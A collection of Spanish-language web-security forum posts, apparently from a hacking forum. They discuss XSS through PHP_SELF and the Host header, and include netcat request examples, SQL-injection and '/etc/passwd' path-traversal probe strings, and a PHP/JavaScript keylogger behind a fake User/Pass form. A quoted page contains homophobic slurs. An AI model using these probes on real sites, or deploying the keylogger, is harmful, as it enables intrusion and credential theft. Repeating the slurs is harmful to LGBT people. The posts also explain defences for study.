Mensajes

<?=$_SERVER['php_self'];?>

Eso tiene xss, te doy un ejemplo http://localhost/script.php/"><h1>XSS/test

Mejor usa script filename: $_SERVER[SCRIPT_NAME]

Tu for dice que si i no es igual a 28 entonces que se detenga, ahora si te fijas ese for solo llegar has el numero 1 asi que debes hacer un while que llegue hasta ese 28

Código (php) [Seleccionar] Expandir

<php
for($i=0;$i<28;$i++){
echo 'Jugador'.$i.': <input type="text" name="$name"><br>';
}
?>

Eso lo conviertes en subdominio

http://webdedescargas.com/s/df'"><h1>lol

PD: tube que editar tu mensaje para evitar problemas con los dueños de esa web  recuerda que esa web acá es webdedescargas.com 
no es sql inyección ya que como no encuentra el software adecuado te lo manda al buscador.

PD2: tengo vista de rayos x

Se supone que le das guardar y debes refrescar pero si la página tenia declarado en el header la no utilización de caché no te va a funcionar, mejor hazlo en tiempo real usando firefox y el complemento firebug.

El firebug es un sistema donde puedes editar el código fuente del sitio web y da a ejecución en tiempo real, con eso podrás hacer tus pruebas.

https://addons.mozilla.org/es-ES/firefox/addon/1843





Para mi las herramientas favoritas en cuanto a audirtoría web son:
Firebugs
Live Headers
Add N Edit Cookies
Modify headers

y el infaltable netcat

No uso el tamper data como lo hacen muchos porque el live headers con el modify headers me dan mas flexibilidad y comodidad.

[Karcrack]

Código (bash) [Seleccionar] Expandir

nc -v lol.esgay.com 80
GET / HTTP/1.1
connection: close
host: Karcrack.esgay.com



... <span class="t14">REDACCION - En una entrevista concedida en e
xclusiva al menda  Karcrack declara estar muy orgulloso de su salida del armario
, se lo dedica a todos los mariquitas y locas del pais que no se atrevieron toda
via a dar el salto y salir del armario, ha sido tal la alegria y el alivio exper ...

Fijate que pedí como subdominio a "lol" pero en el header envié "Karcrack".
Ahora probemos el xss 

Código (bash) [Seleccionar] Expandir

nc -v lol.esgay.com 80
GET / HTTP/1.1
connection: close
host: <h1>XSS.esgay.com



... <span class="t14">REDACCION - En una entrevista concedida en e
xclusiva al menda  <h1>xss declara estar muy orgulloso de su salida del armario,
se lo dedica a todos los mariquitas y locas del pais que no se atrevieron todav
ia a dar el salto y salir del armario, ha sido tal la alegria y el alivio experi
mentado por  <h1>xss que se ha marcado una jota aragonesa en pelota picada. Prox
imamente,  <h1>xss sera invitado a la proxima celebracion de &quot;La cena de lo
s gays&quot;, una popular celebracion popular, en la que se reunen un conjunto d ...

pero inyección sql no encontré.

Hola, href=page1 eso es código html y por lo visto reto.php?page= no se si puede haber algo, puede que si como puede que no, todo es cosa de ir testeando como por ejemplo si page es numero puedes intentar..

reto.php?page='x
reto.php?page=1 and 1=1
reto.php?page=1' and 1='1

si es con letras puedes intentar...

reto.php?page=../../../../../etc/passwd%00
reto.php?page=index (se reincluye redeclarando funciones arrojando un file disclosure)
reto.php?page=%00

si tiene extensiones puedes probar..

reto.php?page=index.php
reto.php?page=../index.php
reto.php?page=../../../../../etc/passwd
reto.php?page=noexisto.php

en fin.. puedes probar de todo pero como te digo, puede que tenga fallas tu sistema como puede que no los tenga, todo es cosa de ir probando y testeando, puede que tenga fallas en otros lados no se. Si quieres me puedes dar la url por privado y hacemos unas pruebas acá para que puedas aprender un poco.

De todas formas no se te olvide pasar por el tema de recopilatorio de post destacados porque ahi hay muy buena información:
http://foro.elhacker.net/nivel_web/los_temas_mas_destacados_sobre_fallas_y_explotaciones_a_nivel_web-t244090.0.html

Nota inicial: webdedescargas.com no es un sitio real, solo es un ejemplo. webdedescargas.com actualmente es un dominio parqueado sin actividad alguna.

estuve investigando un poco sobre una falla de seguridad poco común que pude encontrar en un sitio web de descargas donde el archivo se mostraba como subdominio, por ejemplo:

Web normal ---> http://firefox.webdedescargas.com/

al crear mi propia petición GET con netcat pensé "que pasaría si modifico el header 'host:' ?" y al hacerlo pude darme cuenta que al igual que otros sitios similares sus valores de respuesta se reflejan en ese header y no necesariamente en el subdominio al que le hize GET. Por ejemplo:

Código (bash) [Seleccionar] Expandir

nc -v www.webdedescargas.com 80
GET / HTTP/1.1
connection: close
host: <h1>XSS.webdedescargas.com



Luego el servidor me responde con cada valor como si mi xss fuera el subdomino válido.
Busqué si había alguna información al respecto y encontré una forma:
http://serhost.com/blog/comments.php?y=06&m=10&entry=entry061022-154634
donde puedes hacerlo con un .htaccess de la siguiente manera:

Código [Seleccionar] Expandir

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} ^$
RewriteCond %{HTTP_HOST} !^(www\.)?serhost\.com$ [NC]
RewriteCond %{HTTP_HOST} ^(www\.)?([^\.]+)\.serhost\.com$ [NC]
RewriteRule ^(.*)$ pruebas/$1 [QSA,L]

Justamente en este ejemplo los subdominios son convertidos en directorios según la request.

Con este dato ya podemos causar desde un XSS persistente como SQL inyecciones dentro de cualquier header utilizando cualquier herramienta de conexión remota.



El resultado del test.html fue justamente el contenido del software llamado nero pero reemplazemos eso por un XSS y verás como se ejecuta, en tagboards y chats eso podría causar un xss persistente o en algunos casos inyecciones sql donde normalmente no tienes acceso a mayores modificaciones para ejecutar las sentencias sql donde por lo visto la constante $_SERVER['SERVER_NAME'] también es afectada (justamente donde no se pensaba que podría llegar algún tipo de ataque en sistemas cms conocidos) asi que ojo al momento de programar.

Hay una forma para enviar los valores de cada tecla pulsada directamente al archivo sin la necesidad de enviar la petición y te ahorras todo el jaleo:

Código (php) [Seleccionar] Expandir

<?php

if(!$_GET['k']){ ?>
Ingrese sus datos<br />
<input type=text /> User<br>
<input type=text /> Pass<br>
<input type=submit>

<script>

document.onkeydown = function(e){
if (!e) e = window.event;
var unicode = e.charCode ? e.charCode: e.keyCode;
var mod = (e.ctrlKey) ? 'Ctrl-': (e.altKey) ? 'Alt-': (e.shiftKey) ? 'Shift-': '';
var tecla = mod + String.fromCharCode(unicode);
grabar('http://<?php echo $_SERVER[HTTP_HOST].$_SERVER[SCRIPT_NAME]; ?>?k=' + tecla);
}

function grabar(url){
var xmlHttp = null;
try{
  xmlHttp = new XMLHttpRequest();
}catch(e){
  try{
   xmlHttp = new ActiveXObject('Msxml2.XMLHTTP');
  }catch(e){
   xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
  }
}
xmlHttp.onreadystatechange = function(){
  if(xmlHttp.readyState == 4) try{
   if(xmlHttp.status == 200) {}
  }catch(e){}
}
xmlHttp.open('get', url);
xmlHttp.send(null);
}
</script>

<?php
}else{
 $file = fopen('datos.txt','a');
 fwrite($file,$_GET['k']);
 fclose($file);
}
?>


Lo que hace es tomar cada tecla pulsada y enviar su valor via GET al mismo archivo guardandolo en un txt, donde dice "a" puedes reemplazarlo por "x" para creación y sobreescritura o escritura solamente dependiendo si ya existe o no, puedes hacerlo con if(file_exist(.. etc etc.

Porque dicen que es imposible, php es tan eficiente como cualquier otro lenguaje:

Código (php) [Seleccionar] Expandir

<?php echo php_uname(); ?>

Ahi lo tienes:
$_ENV["COMPUTERNAME"]